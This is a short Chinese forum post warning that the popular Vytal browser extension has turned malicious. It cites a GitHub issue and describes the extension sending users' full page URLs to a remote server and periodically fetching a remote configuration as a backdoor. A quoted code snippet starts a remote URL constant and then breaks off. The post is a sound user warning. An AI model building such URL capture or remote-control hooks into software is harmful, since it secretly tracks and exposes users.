不知道论坛有没有人用，这个插件在海外一直人气很高 
 [AK1Ce612@2x] 
恶意行为
在GitHub页面已经有用户报告了相关的恶意行为：[URGENT] 🚨 Vytal Extension is Now Acting Maliciously · Issue #55 · vytal-io/vytal-extension · GitHub 


数据截取与传输 

扩展在用户访问页面时截取完整的 URL（包括 location.href 信息）并将其发送到远程服务器。传输的数据中可能包含：

当前页面的完整地址（协议、域名、路径及查询参数）
查询字符串中的参数，这些参数有时包含敏感或标识信息





动态远程配置与后门控制 

扩展在后台代码中，通过类似如下的代码片段定时获取远程配置：



     \[
     \texttt{const l = "https://syncxm...